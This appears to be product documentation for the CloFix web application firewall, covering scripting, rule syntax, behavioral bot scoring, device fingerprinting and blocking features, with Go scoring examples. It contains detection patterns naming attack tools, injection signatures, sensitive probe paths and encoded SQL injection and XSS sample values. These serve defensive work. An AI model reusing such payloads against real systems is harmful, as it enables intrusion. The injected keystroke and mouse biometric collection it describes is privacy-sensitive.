- Brute Force Protection: Login path detection with shared dictionary counters, 10 attempts/5min window, 30-minute ban, and configurable thresholds
- DDoS Shield: Two-tier protection - burst detection (30 req/2s) and sustained rate (200 req/min) with escalating bans (60s → 600s → 86400s) using shared dictionaries
- Bot Detection: `request.is_bot`, `request.is_headless`, `request.bot_score`, UA pattern matching (python, curl, wget, sqlmap, nikto, gobuster), and missing UA blocking
- GeoIP Blocking: `request.country` ISO-3166 codes, `request.region`, `request.city`, `request.asn`, `request.org` - block specific countries, ASNs, or regions
- JA3/JA4 Fingerprinting: `request.ja3` and `request.ja4` for TLS stack identification - block known attack tools even with IP rotation
- IP Reputation: `clofix.ip_reputation()` returns "clean"/"suspicious"/"malicious" - block malicious IPs instantly
- Path Whitelisting: Protect admin endpoints (`/admin`, `/wp-admin`) with IP allowlists using shared dictionaries
- Execution Limits: 50ms wall-clock timeout per script, 32MB memory limit, 200 call stack depth - prevents resource exhaustion
- Directory Structure: `./lua_script/` with alphabetical execution order - use numeric prefixes (`01_rate_limit.lua`, `02_bot_detection.lua`) for priority
- Domain Configuration: Enable Lua with `lua { enabled on; lua_shared_dict ddos_attack 10m; }` in domain config
How it works: Lua scripts execute in isolated VM instances with 50ms timeout. Files run in alphabetical order - first non-allow action stops pipeline. The `clofix_main(request)` function receives a request object with all HTTP context, GeoIP, JA3 fingerprint, and threat intelligence fields. Shared dictionaries (`clofix.shared.*`) provide thread-safe cross-request storage with TTL. Payload normalization (`clofix.normalize_payload()`) defeats encoding evasion before pattern matching. The scoring engine allows multi-rule accumulation before final action. Structured attack logging (`clofix.log_attack()`) automatically captures full request context for SIEM integration. All functions are C-bound for performance - Lua scripts typically process 80,000 requests/second on modest hardware.
Official Documentation: CloFix Lua Scripting Guide - Complete API reference with SQL injection, XSS, rate limiting, DDoS protection, shared dictionaries, and 15+ production-ready examples
CloFix Custom Rules & Scripting
Unified rule engine combining CloFixRule directives, JavaScript, and Lua with intelligent bypass system
Key Benefits
- CloFixRule Directive: CRS-style custom rules with variables (ARGS, REQUEST_HEADERS, REQUEST_URI, BODY), operators (@rx regex, @contains, @streq, @pm, @beginsWith, @endsWith), and transformations (t:lowercase, t:urlDecode, t:htmlEntityDecode, t:removeNulls, t:compressWhitespace)
- Multi-Language Support: Choose between declarative CloFixRule (YAML-like), JavaScript (clofix), or Lua (clofix_main) - mix and match in the same deployment with alphabetical execution order
- Intelligent Bypass System: Bypass rules by rule ID, tag (`attack-sqli`, `paranoia-level/3`), phase (1-4 request/response), path (`/health`, `/api/public/*`), or IP (`127.0.0.1`, `192.168.1.*`, `10.0.0.0/8`)
- Anomaly Scoring Engine: Each rule contributes weighted points to anomaly score (CRITICAL=5, ERROR=4, WARNING=3, NOTICE=2, INFO=1). Threshold-based blocking with configurable inbound/outbound limits
- Paranoia Levels 1-4: Progressive protection from minimal false positives (Level 1) to maximum security (Level 4) - adjust per domain or globally
- Pattern Extraction: JavaScript files automatically scanned for strings and regex patterns - used for fast matching without execution overhead
- Shared Dictionaries: Persistent cross-request state with TTL - `sharedDict("name")` in JavaScript, `clofix.shared.*` in Lua, perfect for rate limiting and bot tracking
- Action Types: `block` (403), `allow`, `rate_limit` (429), `challenge` (CAPTCHA), `redirect`, `log_only`, `captcha` - with custom status codes and messages
- Transformation Chains: Apply multiple transformations sequentially - `t:lowercase,t:urlDecode,t:htmlEntityDecode` defeats encoding evasion techniques
- Virtual Patching: Create custom rules to patch vulnerable applications without code changes - deploy within minutes of vulnerability disclosure
- Rule Testing Sandbox: Interactive playground to test custom rules against historical traffic or custom payloads before production deployment
- Pre-built Rule Templates: 200+ community-contributed templates for WordPress, Drupal, Joomla, Magento, Laravel, Django, and custom applications
- API Rate Limiting DSL: Specialized syntax for API protection - per-endpoint limits, burst handling, graduated response (slow down → challenge → block)
- Bot Detection Rules: Pre-configured bot fingerprints for 500+ known bots (Googlebot, Bingbot, ChatGPT, GPTBot, Anthropic) with custom actions per bot type
- Credential Stuffing Protection: Login endpoint velocity checks, password reuse patterns, and known breached credentials via haveibeenpwned API integration
- GraphQL Security Rules: Introspection blocking, depth limiting (default max depth 10), complexity scoring, and batch query throttling
- gRPC Method Filtering: Whitelist/blacklist specific gRPC methods with regex patterns - block reflection services and internal methods from external callers
- JSON Schema Validation: Enforce JSON schemas on API requests - block malformed payloads before they reach your application logic
- XML/SOAP Validation: Detect XML bombs, XXE attacks, and schema violations in SOAP and REST XML payloads
- Custom Response Rules: Inspect and modify responses - add security headers (CSP, HSTS), remove server signatures, inject monitoring scripts, block responses containing sensitive data
- Webhook Actions: Trigger external webhooks on rule matches - send alerts to Slack, PagerDuty, or custom SIEM solutions with full request context
- Delayed Response (Tarpitting): Slow down attackers with configurable delays - waste attacker resources while maintaining legitimate user experience
- Log Sampling: Sample and log only matching rules at configurable rates - reduce log volume while maintaining security visibility
- Rule Groups: Organize rules into named groups (PCI, HIPAA, WordPress, API) - enable/disable entire groups with a single toggle for multi-tenant environments
- Priority Execution: Assign execution priority (1-1000) - ensure critical rules run first while complex analysis runs later. Pre-optimize based on historical match rates
- Rule Metrics Dashboard: Real-time metrics per rule - match count, false positive rate, execution time, and impact score. Identify rules causing latency or blocking legitimate traffic
- Automated Rule Optimization: ML-powered suggestions to reduce false positives - learn from blocked vs. allowed traffic patterns and suggest threshold adjustments
- Rule Export/Import: Export rule sets as YAML/JSON for backup, version control, or sharing across deployments. Import from other CloFix instances or community repositories
- Inline Documentation: Document rules with markdown descriptions, examples, and remediation steps - built-in documentation viewer for security teams
- Rule Scheduling: Schedule rules for specific maintenance windows or seasonal traffic - automatically enable holiday shopping protection, disable during low-traffic periods
How it works: CloFix Custom Rules engine processes rules in execution priority order across three scripting languages. CloFixRule directives are compiled into optimized decision trees for O(log n) lookup times. JavaScript and Lua scripts execute in isolated VMs with 2-second (JS) or 50ms (Lua) timeouts. Files execute alphabetically - use numeric prefixes like `01_rate_limit.js`, `02_bot_detection.lua`, `03_clofixrule.conf` to control pipeline order. The intelligent bypass system supports rule ID, tag, phase, path, and IP bypasses - documented bypasses are essential for production. All rule executions are traced in the audit log with detailed match information for forensics and tuning. Shared dictionaries (`sharedDict` in JS, `clofix.shared` in Lua) maintain cross-request state with TTL support. Pattern extraction from JavaScript files automatically creates fast-matching signatures checked against every request.
Official Documentation: CloFixRule & Custom Rules Guide - Complete syntax reference with variables, operators, transformations, bypass configuration, and 50+ rule examples
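As an added illustration of the transformation chain and anomaly-scoring mechanics described above (Go code written for this page, not CloFix's own; the `rule` and `arg` structs, the `CUSTOM-*` rule IDs and the sample request are constructed, and only the page's transformation and operator names are reused):

```go
package main

import (
	"fmt"
	"html"
	"net/url"
	"regexp"
	"strings"
)

// Severity weights for the anomaly score, as listed on the page.
var severityPoints = map[string]int{"CRITICAL": 5, "ERROR": 4, "WARNING": 3, "NOTICE": 2, "INFO": 1}

// rule is a hypothetical in-memory form of one CloFixRule directive (the real syntax is in the guide).
type rule struct {
	ID         string
	Severity   string
	Transforms []string // applied left to right, e.g. t:lowercase,t:urlDecode
	Operator   string   // @rx or @contains
	Pattern    string
}

// arg is one ARGS entry (query or body parameter), kept in request order.
type arg struct{ Name, Value string }

// applyTransforms runs a transformation chain in order. A malformed percent-encoding
// keeps the value as-is instead of skipping the rule, so it cannot dodge inspection.
func applyTransforms(v string, chain []string) (string, error) {
	for _, t := range chain {
		switch t {
		case "t:lowercase":
			v = strings.ToLower(v)
		case "t:urlDecode":
			if d, err := url.QueryUnescape(v); err == nil {
				v = d
			}
		case "t:htmlEntityDecode":
			v = html.UnescapeString(v)
		case "t:removeNulls":
			v = strings.ReplaceAll(v, "\x00", "")
		case "t:compressWhitespace":
			v = strings.Join(strings.Fields(v), " ")
		default:
			return "", fmt.Errorf("unknown transformation %q", t)
		}
	}
	return v, nil
}

// matches applies the rule's operator to the transformed value.
func (r rule) matches(v string) (bool, error) {
	tv, err := applyTransforms(v, r.Transforms)
	if err != nil {
		return false, err
	}
	switch r.Operator {
	case "@rx":
		re, err := regexp.Compile(r.Pattern)
		if err != nil {
			return false, err
		}
		return re.MatchString(tv), nil
	case "@contains":
		return strings.Contains(tv, r.Pattern), nil
	}
	return false, fmt.Errorf("unknown operator %q", r.Operator)
}

// evaluate scores the ARGS collection: each rule adds its severity points at most once
// per request; the request is blocked once the total reaches the inbound threshold.
func evaluate(rules []rule, args []arg, threshold int) (score int, matched []string, blocked bool, err error) {
	for _, r := range rules {
		for _, a := range args {
			ok, e := r.matches(a.Value)
			if e != nil {
				return 0, nil, false, e
			}
			if ok {
				score += severityPoints[r.Severity]
				matched = append(matched, r.ID+":ARGS:"+a.Name) // rule:variable for the audit log
				break
			}
		}
	}
	return score, matched, score >= threshold, nil
}

// sampleRules and sampleRequest are constructed for this example, not CloFix's shipped
// rules or real traffic. Both request values are encoded, so a raw-string check misses them.
func sampleRules() []rule {
	chain := []string{"t:lowercase", "t:urlDecode", "t:htmlEntityDecode", "t:compressWhitespace"}
	return []rule{
		{ID: "CUSTOM-001", Severity: "CRITICAL", Transforms: chain, Operator: "@rx", Pattern: `union\s+select`},
		{ID: "CUSTOM-002", Severity: "WARNING", Transforms: chain, Operator: "@contains", Pattern: "<script"},
	}
}

func sampleRequest() []arg {
	return []arg{{"q", "1%27%20UNION%20SELECT"}, {"name", "&lt;script&gt;"}}
}
```

With the inbound threshold set to 5, `evaluate(sampleRules(), sampleRequest(), 5)` scores 8 (CRITICAL 5 + WARNING 3) and blocks; the same request with `t:urlDecode` and `t:htmlEntityDecode` removed from the chain scores 0, which is the encoding evasion the chain exists to defeat.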
Default Protection
Behavioral Analysis
Advanced browser vs. bot detection using behavioral patterns and TLS fingerprinting
Key Benefits
- Request-1 Blocking: FastBlocker fires on the very first request - no history needed. Missing Sec-Fetch-*, bare Accept headers, and low header count score instantly before any proxying occurs
- JA3 TLS Fingerprinting: Computed directly from Go's tls.ClientHelloInfo via GetConfigForClient hook - no nginx module required. CipherSuites, SupportedVersions, SupportedCurves, SignatureSchemes, ALPN, and SNI all contribute to the hash
- Known Browser Database: Chrome, Firefox, Safari, Edge, Opera, Brave, and Tor Browser JA3 hashes pre-loaded. Exact match = instant allow with zero behavioral scoring overhead
- UA Structure Analysis: Detects tools by shape, not name - no hardcoded tool strings. Checks Mozilla/ token, platform () grouping, and AppleWebKit/Gecko presence. All three must exist simultaneously
- Sec-Fetch Header Detection: Injected by all browsers since Chrome 76 / Firefox 90 - absent in every HTTP library. Missing all three Sec-Fetch-Site/Mode/Dest headers scores +35pts instantly
- Tiered Velocity Scoring: Three escalating tiers - warn (+20), high (+35), extreme (+50) - scored per JA3 fingerprint over a 5-minute sliding window. IP rotation doesn't help if TLS stack is consistent
- Machine Timing Detection: Coefficient of variation (stddev/mean) of inter-request intervals. CV <0.05 AND mean <2s = machine precision timing (+45pts). Requires only 4 requests to compute
- Uniform Response Time Detection: Tools receive consistent server response times. CV <0.1 across 6+ requests flags automated polling (+20pts)
- Shannon Path Entropy: Entropy <0.6 on normalized paths = scanner repeating same endpoints (+20pts). Entropy <0.3 with 10+ requests = very low entropy (+35pts). Paths normalized: /api/users/123 → /api/users/*
- Sequential Enumeration: Detects /item/1, /item/2, /item/3 numeric crawl patterns. Fires when >30% of consecutive path pairs are sequential (+35pts)
- High Path Density: >90% unique paths in <8 requests = scanner walking endpoints (+25pts). Combined with velocity = strong scanner signal
- Zero Static Assets: Real users load CSS/JS/images - tools never do. 0% static asset ratio after 10+ requests adds +30pts. Checked against 18 file extensions
- Method Probing Detection: 4+ distinct HTTP methods (GET/POST/PUT/DELETE/PATCH/OPTIONS/HEAD) against the same path = method enumeration attack (+30pts)
- Error Rate Analysis: Three tiers - elevated (>25% 4xx → +12pts), high (>50% 4xx/5xx → +25pts), 404-dominant (>50% 404 → +35pts). Distinguishes path probing from application errors
- Parameter Fuzzing Detection: Same endpoint with 10+ unique parameter names across 20+ requests = automated parameter discovery (+30pts)
- UA Rotation Detection: >30% unique User-Agents across 10+ requests = evasion attempt via UA cycling (+25pts)
- Burst Pattern Detection: Zero requests in the prior 9-minute window followed by 20+ in the last minute = attack burst after reconnaissance silence (+30pts)
- Path Traversal Scoring: Double-dot sequences (../, ..\, %2e%2e), null bytes (\x00, %00), CRLF injection (\r, \n) in request paths scored independently in both FastBlocker and BehaviorEngine layers
- Query String Injection: Structural injection patterns in query strings - union+select, <script, onerror=, exec(, base64_decode(, javascript: - scored +50–55pts on first occurrence
- Sticky Block System: Score ≥70 triggers a 15-minute hard block written to the profile. Pre-request IsBlocked() check fires before WAF rules, DDoS engine, or upstream proxy
- Block Auto-Expiry: Block TTL auto-expires on the next request after 15 minutes. Profile demoted to challenge state rather than deleted - retains behavioral history
- Session Trust Bonus: Established sessions older than 10 minutes with score <20 receive a −15pts reduction. Prevents over-blocking legitimate power users
- New Profile Penalty: Profile younger than 10 seconds with 15+ requests scores +20pts - human-impossible volume in that window
- Domain Isolation: Profile store is per-domain. Dashboard locked to r.Host - ?domain= query parameter is completely ignored server-side, preventing cross-tenant data leakage
- IP Rate Limiter: Sliding window 30 req/10s per IP. Fires independently of behavioral scoring - instant 5-minute block regardless of headers or UA
- Health Check Bypass: Silent monitoring probes (no UA, GET /, no body) are whitelisted at FastBlocker level - load balancer checks never accumulate false-positive scores
- Learning Mode: Monitor-only mode records detections and flags profiles without blocking. Safe for baseline establishment. Toggle live via /waf-dashboard/behavior-learning endpoint
- Profile Ring Buffer: Each profile stores the last 100 requests in memory with O(1) eviction. Fixed memory footprint regardless of request volume
- Background Sweeper: Idle profiles evicted every 5 minutes after 30-minute TTL. Prevents unbounded memory growth under sustained scan traffic
- 2 Layers, 20+ Signals: Layer 1 (FastBlocker) - 7 instant signals on request 1. Layer 2 (BehaviorEngine) - 13 multi-request signals over sliding 5-minute window. Both run synchronously before upstream proxy. No external dependencies - no Redis, no database, no sidecar
How it works: Every request passes through two independent scoring layers. FastBlocker evaluates structural signals immediately - Sec-Fetch headers, Accept quality, header count, UA shape, path anomalies, and IP rate. BehaviorEngine builds a per-fingerprint profile and scores velocity, timing regularity, path entropy, error rates, static asset ratio, burst patterns, and more over a sliding 5-minute window. A fingerprint reaching score ≥70 is sticky-blocked for 15 minutes. JA3 hash from the TLS ClientHello is the primary profile key - IP rotation, VPN hops, and proxy chains don't reset the profile if the TLS fingerprint is consistent. The entire system runs in-process with no external dependencies.
No-IP Device Behavioral Protection
Advanced device fingerprinting that tracks malicious actors across IP changes, VPNs, proxies, and Tor. Uses behavioral biometrics (keystrokes, mouse movements, scrolling patterns), canvas/WebGL fingerprints, TLS JA3 hashing, and velocity analysis to identify and block automated threats even when they rotate IP addresses
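The following Go code is an added example, not CloFix's source, of how the path normalization, Shannon path entropy and timing coefficient-of-variation signals above combine against the 70-point block threshold; the `reqEvent` shape, the sample traffic, and the assumption that the two entropy tiers do not stack are constructed for this illustration.

```go
package main

import (
	"math"
	"regexp"
	"strconv"
	"strings"
	"time"
)

// reqEvent is an assumed shape for one profile entry; CloFix's own structs are not on the page.
type reqEvent struct {
	At   time.Time
	Path string
}
var numericSeg = regexp.MustCompile(`^[0-9]+$`)

// normalizePath collapses numeric segments: /api/users/123 -> /api/users/*
func normalizePath(p string) string {
	parts := strings.Split(p, "/")
	for i, s := range parts {
		if numericSeg.MatchString(s) {
			parts[i] = "*"
		}
	}
	return strings.Join(parts, "/")
}

// pathEntropy is the Shannon entropy, in bits, of the normalized path distribution.
func pathEntropy(events []reqEvent) float64 {
	counts := map[string]int{}
	for _, e := range events {
		counts[normalizePath(e.Path)]++
	}
	n, h := float64(len(events)), 0.0
	for _, c := range counts {
		p := float64(c) / n
		h -= p * math.Log2(p)
	}
	return h
}

// timingCV returns the mean (seconds) and coefficient of variation (stddev/mean)
// of inter-request intervals; ok is false below the page's 4-request minimum.
func timingCV(events []reqEvent) (mean, cv float64, ok bool) {
	if len(events) < 4 {
		return 0, 0, false
	}
	n := float64(len(events) - 1)
	var sum, sumSq float64
	for i := 1; i < len(events); i++ {
		d := events[i].At.Sub(events[i-1].At).Seconds()
		sum, sumSq = sum+d, sumSq+d*d
	}
	if mean = sum / n; mean <= 0 {
		return 0, 0, false
	}
	variance := math.Max(0, sumSq/n-mean*mean) // clamp rounding noise
	return mean, math.Sqrt(variance) / mean, true
}

// blockThreshold: a score of 70 or more triggers the 15-minute sticky block.
const blockThreshold = 70
var t0 = time.Date(2024, 1, 1, 0, 0, 0, 0, time.UTC) // constructed sample clock

// score applies the page's thresholds for the timing and path-entropy signals and returns
// the total plus audit reasons. Treating the two entropy tiers as exclusive is an assumption.
func score(events []reqEvent) (int, []string) {
	total, reasons := 0, []string{}
	add := func(pts int, why string) { total += pts; reasons = append(reasons, why) }
	if mean, cv, ok := timingCV(events); ok && cv < 0.05 && mean < 2 {
		add(45, "machine timing")
	}
	if h := pathEntropy(events); h < 0.3 && len(events) >= 10 {
		add(35, "very low path entropy")
	} else if h < 0.6 {
		add(20, "low path entropy")
	}
	return total, reasons
}

// scannerSample is a constructed enumeration run: a request every 500ms to /item/1 ... /item/12.
func scannerSample() []reqEvent {
	var ev []reqEvent
	for i := 1; i <= 12; i++ {
		ev = append(ev, reqEvent{t0.Add(time.Duration(i) * 500 * time.Millisecond), "/item/" + strconv.Itoa(i)})
	}
	return ev
}

// humanSample is a constructed session: irregular gaps, distinct pages, one static asset.
func humanSample() []reqEvent {
	ms := []time.Duration{0, 1200, 4700, 5500, 12500}
	var ev []reqEvent
	for i, p := range []string{"/", "/css/app.css", "/about", "/blog/intro", "/contact"} {
		ev = append(ev, reqEvent{t0.Add(ms[i] * time.Millisecond), p})
	}
	return ev
}
```

The scanner sample scores 45 (machine timing) + 35 (all twelve paths normalize to `/item/*`) = 80 and crosses `blockThreshold`; the human sample scores 0.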
Key Benefits
- IP-Agnostic Fingerprinting: Generates persistent device IDs using browser fingerprints, canvas/WebGL hashes, audio context, fonts, screen resolution, hardware concurrency, and OS detection - tracks devices even when they change IP addresses via VPN, proxy, or Tor
- Browser & OS Detection: Identifies browser (Chrome, Firefox, Safari, Edge, Opera, Brave), browser engine (Blink, WebKit, Gecko), OS (Windows, macOS, iOS, Android, Linux), OS version, and architecture (x86_64, ARM64) - detects spoofing attempts
- Canvas Fingerprinting: Generates unique canvas hashes from rendered text, shapes, and colors - persistent across sessions and IP changes. Detects canvas hash changes within consistency window as indication of emulation or spoofing
- WebGL Fingerprinting: Extracts WebGL renderer and vendor information (Mali, Adreno, Apple GPU, NVIDIA, Intel) via WEBGL_debug_renderer_info extension - detects emulated GPU environments
- Audio Context Fingerprinting: Analyzes oscillator waveform rendering differences across browsers and devices - each device produces unique audio hashes based on hardware
- Font Fingerprinting: Detects installed system fonts via flash of invisible text (FOIT) measurement - 100+ font families tested for device uniqueness
- Hardware Fingerprinting: Collects screen resolution, color depth, pixel ratio, hardware concurrency (CPU cores), device memory, and max touch points - creates comprehensive device signature
- Headless Browser Detection: Scores headless probability (0.0-1.0) based on User-Agent patterns (HeadlessChrome, PhantomJS, Puppeteer, Playwright) and behavioral anomalies - blocks scores above 0.5 with 0.9 confidence
- Automation Detection: Identifies automation tools (Selenium, Puppeteer, Playwright, Python-Requests, curl, wget, Go-http, Postman, Insomnia) with weighted scoring - blocks with 0.7+ score
- Behavioral Biometrics - Keystroke Dynamics: Tracks key press timing (inter-key latency) and key hold duration - calculates average typing speed, rhythm hash, and standard deviation. Standard deviation <2ms indicates robotic typing (+20% risk)
- Behavioral Biometrics - Mouse Movements: Records mouse coordinates, calculates speed, acceleration, and curvature. Sustained near-zero curvature indicates robotic movement +15% risk. Generates mouse movement hash from last 20 points
- Behavioral Biometrics - Click Patterns: Tracks click coordinates and target elements, calculates average click position, detects exact click repetition (>80% same pixel = robotic +15% risk)
- Behavioral Biometrics - Scroll Patterns: Records scroll position, speed, and direction - calculates average scroll speed and dominant direction (up/down/both)
- Request Velocity Tracking: Rolling windows (1-minute, 5-minute, 1-hour) track request density - thresholds: 300 req/min, 1400 req/5min, 30 req/sec burst detection triggers +35% risk score
- IP Hopping Detection: Tracks unique IPs per device in 1-hour window. 3+ unique IPs flags IP hopping +30% risk - blocks VPN/proxy rotation attacks
- Geo-Impossible Travel Detection: Calculates speed between geographic locations (requires GeoIP). Speed >900 km/h triggers geo-impossible travel +35% risk - detects VPN hopping across continents
- Canvas Consistency Monitoring: Tracks canvas hash changes within 15-minute window on same User-Agent. Hash changes indicate emulation/anti-fingerprinting +25% risk
- TLS JA3 Fingerprinting: Cross-references JA3 hash from Cloudflare or proxy headers - tracks TLS stack even when IP changes. Self-signed certificates bypass JA3 checks to avoid false positives
- Login Brute Force Detection: 5-minute rolling window tracks failed login attempts - 5+ failures in 5m = +30% risk, 15+ in 1h = +25% risk. Persistent threat memory stores total failed logins across sessions
- Sensitive Path Probing: Detects enumeration of /wp-admin, /admin, /phpmyadmin, /.env, /.git, /backup, /config - +15% risk per probe
- Path Scanning Detection: 50+ unique paths per device flags directory brute-forcing +20% risk
- Rapid Request Detection: Inter-request intervals <50ms flag automation +10% risk
- Header Completeness Analysis: Detects missing Accept, Accept-Language, Accept-Encoding headers - common in tools (+15% risk each). Chrome missing Connection header is normal (HTTP/2)
- User-Agent Structure Validation: Validates Mozilla signature, parentheses structure, version numbers. Empty UA +40pts, missing Mozilla +20pts, no parentheses +10pts
- Accept Header Analysis: */* without quality values flags generic accept +15% risk for non-browser clients
- Cookie Handling Detection: Missing cookies +10% risk for authenticated paths (tools often don't handle cookies)
- Referer Validation: Missing referer on non-root paths +10% risk
- Persistent Threat Memory: Tracks total blocks, failed logins, attack types, and suspicion score across sessions - survives block expiry, increases risk weighting by 30% for repeat offenders
- Risk Score Calculation: Weighted aggregation (IP hopping 0.30, geo travel 0.35, burst 0.35, velocity 0.15-0.20, brute force 0.25-0.30, headless 0.35, automation 0.25, robotic typing 0.20, canvas inconsistency 0.25). Threshold 0.70 = malicious, 0.40-0.70 triggers challenge
- Confidence Scoring: Based on data points (requests, keystrokes, mouse moves) - max 1.0 at 500+ points, prevents false positives on limited data
- Auto-Blocking: Risk ≥0.70 triggers 15-minute block (configurable), threat memory records each block and elevates suspicion score
- Challenge System: Risk 0.40-0.70 issues proof-of-work CAPTCHA challenges. Successful challenges reduce risk by 0.20, failed challenges add 0.10 risk
- Automatic Session Cleanup: 1-hour background sweeper removes fingerprints idle >30 days, auto-unblocks devices after BlockDuration
- Memory Efficient: Ring buffers for request history (last 200 requests), keystroke/mouse data (last 1000 points), IP history (last 100 entries) - prevents unbounded memory growth
- API Endpoints: /api/behavioral/device (fingerprint), /api/behavioral/keystroke (typing patterns), /api/behavioral/mouse (mouse movements), /api/behavioral/click (click patterns), /api/behavioral/scroll (scroll behavior), /api/behavioral/challenge (CAPTCHA), /debug/noip-stats (statistics)
- Client-Side Collector: An 8KB JavaScript collector is automatically injected into HTML pages - collects canvas hash, WebGL, audio fingerprint, keystrokes, mouse movements, clicks, scrolls. The sendBeacon API ensures delivery without blocking navigation
- Zero External Dependencies: No Redis, no database - all fingerprint data stored in memory with automatic cleanup. 10,000 fingerprints consume ~200MB RAM
- Performance Impact: <50µs per request for fingerprint lookup, <500KB memory per active fingerprint, FIFO eviction prevents leaks
How it works: The No-IP Behavioral Protection system generates a persistent device ID using browser fingerprints that survive IP changes. When a request arrives, the system extracts device identity from User-Agent, OS, browser engine, and hardware signals. Canvas/WebGL/Audio fingerprints create a hardware-level signature. The client-side JavaScript collects behavioral biometrics (keystroke timing, mouse movement curves, click patterns, scroll velocity) and sends them via sendBeacon API. The server tracks velocity in rolling windows (1m/5m/1h), detects IP hopping via history analysis, and calculates geographic speed using GeoIP (if available). Each violation adds weighted risk points - reaching 0.70 triggers a 15-minute IP-agnostic block based on device ID. The threat memory persists across block expiry, so repeat offenders face stricter scrutiny. All fingerprint data stays in memory with automatic TTL-based cleanup (30 days idle). No external dependencies required - the entire system runs in-process with sub-50µs overhead.
Detection Metrics:
- IP-hopping detection: 3+ unique IPs/1h = +30% risk
- Geo-impossible travel: Speed >900 km/h = +35% risk
- Login brute force: 5 failures/5m = +30% risk
- Canvas inconsistency: Hash changes within 15m = +25% risk
- Headless detection: 0.5+ score = +35% risk
- Automation detection: 0.7+ score = +25% risk
- Robotic typing: Std Dev <2ms = +20% risk
- Burst attack: 30+ req/sec = +35% risk
- High velocity: 300+ req/min = +20% risk
- Path scanning: 50+ unique paths = +20% risk
Detected Threat Types:
- VPN/Proxy Rotation: IP hopping detection tracks IP changes regardless of anonymization service
- Tor Network: Geo-impossible travel flags rapid international movement
- Headless Browsers: HeadlessChrome, PhantomJS, Puppeteer, Playwright detection via UA + behavioral analysis
- Automation Tools: Selenium WebDriver, Python-Requests, curl, wget, Go-http, Postman, Insomnia
- Credential Stuffing: Login velocity tracking (5m/1h windows) with persistent failure memory
- Brute Force: Combined IP-hopping + login velocity + path scanning detection
- DDoS Botnets: Velocity thresholds (300 req/min, 30 req/sec) with burst detection
- Scrapers/Crawlers: Missing browser headers, no cookies, robotic mouse movements, exact click repetition
- Directory Brute-Forcing: Path diversity detection (50+ unique paths) + sensitive path probing
- Anti-Fingerprinting Tools: Canvas hash drifting within consistency window flags emulation
AI-Powered Protection
Fingerprint Blocking
Blocks requests based on malicious browser/device fingerprinting patterns.
- Detects abnormal browser fingerprints
- Identifies spoofed user agents
- Blocks headless browser signatures
- Prevents fingerprint-based evasion techniques
Payload Blocking
Detects and blocks malicious payloads in requests using AI-powered analysis.
- Real-time payload inspection
- ML-based threat classification
- Zero-day exploit detection
- Multi-vector payload analysis
Traffic Anomaly Blocking
Identifies and blocks abnormal traffic patterns using behavioral analysis.
- Detects traffic spikes and anomalies
- Identifies DDoS attack patterns
- Behavioral baselining
- Automated threat response
IP Reputation Blocking
Blocks requests from known malicious IP addresses using real-time threat intelligence.
- Integration with blocklist.de
- Real-time IP reputation checks
- Dynamic blacklist updates
- Custom IP blacklisting
JavaScript Behavior Blocking
Analyzes and blocks suspicious JavaScript behavior in real-time.
- Detects malicious JS execution
- Identifies cryptojacking attempts
- Blocks DOM manipulation attacks
- Prevents JS-based data exfiltration
Cookie Validation Blocking
Validates and blocks requests with tampered cookies using AI-based scoring.
- Detects cookie tampering attempts
- Validates session integrity
- Blocks session hijacking
- Prevents replay attacks
Device Identity Blocking
Blocks requests from untrusted or spoofed devices using device fingerprinting.
- Device fingerprint validation
- Detects emulator environments
- Blocks device spoofing
- Cross-session device tracking
Automation Tool Blocking
Detects and blocks automated bot/script traffic with high accuracy.
- Detects Selenium, Puppeteer, Playwright
- Identifies headless browsers
- Blocks scraping tools
- Prevents automated attacks
Cloud Service Blocking
Blocks requests from known cloud hosting providers when malicious patterns are detected.
- Identifies cloud data center traffic
- Blocks malicious cloud-based attacks
- AWS/Azure/GCP detection
- Cloud IP range filtering
DNS Rebinding Blocking
Prevents DNS rebinding attacks through intelligent detection.
- Detects DNS rebinding patterns
- Validates DNS responses
- Blocks internal IP exposure
- Prevents SSRF via DNS rebinding
Credential Stuffing Blocking
Detects and blocks credential stuffing attempts using behavioral analysis.
- Identifies rapid login attempts
- Detects password spraying
- Blocks breached credential use
- Rate limiting for auth endpoints
Crawler Detection Blocking
Identifies and blocks malicious web crawlers while allowing legitimate search engines.
- Differentiates good/bad crawlers
- Validates search engine bots
- Blocks content scrapers
- Prevents competitive data mining
API Abuse Blocking
Prevents API abuse and excessive API calls using ML-based detection.
- Detects API scraping
- Identifies abnormal API patterns
- Prevents business logic abuse
- Intelligent rate limiting
Header Injection Blocking
Blocks HTTP header injection attacks through comprehensive validation.
- Detects CRLF injection
- Prevents response splitting
- Blocks host header attacks
- Validates all HTTP headers
TLS Fingerprint Blocking
Blocks requests based on malicious TLS fingerprint patterns (JA3/JA3S).
- JA3 fingerprint analysis
- Detects malicious TLS clients
- Identifies bot TLS patterns
- Blocks known attack tools
SSL MITM Blocking
Detects and blocks SSL Man-in-the-Middle attacks through advanced analysis.
- Detects SSL stripping
- Identifies certificate anomalies
- Blocks MITM proxies
- Validates TLS handshakes
Open Redirect Blocking
Prevents open redirect vulnerabilities through intelligent URL validation.
- Detects malicious redirects
- Validates redirect URLs
- Blocks phishing attempts
- Prevents open redirect exploitation
Fake Bot Blocking
Blocks impersonation of search engine bots through rigorous validation.
- Validates search engine IPs
- Detects bot impersonation
- Reverse DNS verification
- Blocks fake crawlers
AI Rate Limit Blocking
AI-based intelligent rate limiting that adapts to traffic patterns.
- Dynamic rate limiting
- Behavior-based thresholds
- Adaptive response
- Prevents DDoS and abuse
JA3 Check
Validates JA3 TLS fingerprint against known malicious patterns.
- JA3 blacklist matching
- Malicious client detection
- Attack tool identification
- Custom JA3 rules
VM/Debug Detection Blocking
Blocks requests from virtual machines and debugging environments.
- Detects VM environments
- Identifies debugger presence
- Blocks sandbox evasion
- Prevents analysis evasion
Canvas Fingerprint Blocking
Blocks requests based on malicious canvas fingerprinting patterns.
- Detects canvas fingerprinting
- Blocks tracking attempts
- Identifies automation tools
- Prevents browser profiling
Path Traversal Blocking
Prevents directory/path traversal attacks through comprehensive filtering.
- Blocks ../ patterns
- Prevents directory listing
- Protects sensitive files
- URL encoding detection
SQL Injection Blocking
Detects and blocks SQL injection attempts using advanced pattern matching.
- Blocks UNION-based attacks
- Detects time-based injection
- Prevents error-based disclosure
- Blocks stacked queries
XSS Detection Blocking
Prevents Cross-Site Scripting (XSS) attacks through comprehensive filtering.
- Blocks reflected XSS
- Prevents stored XSS
- Detects DOM-based XSS
- Filters malicious scripts
Command Injection Blocking
Blocks OS command injection attempts through rigorous input validation.
- Detects shell metacharacters
- Blocks command chaining
- Prevents RCE attempts
- Filters dangerous commands
XXE Detection Blocking
Prevents XML External Entity attacks through XML parsing protection.
- Blocks external entity expansion
- Prevents XXE-based SSRF
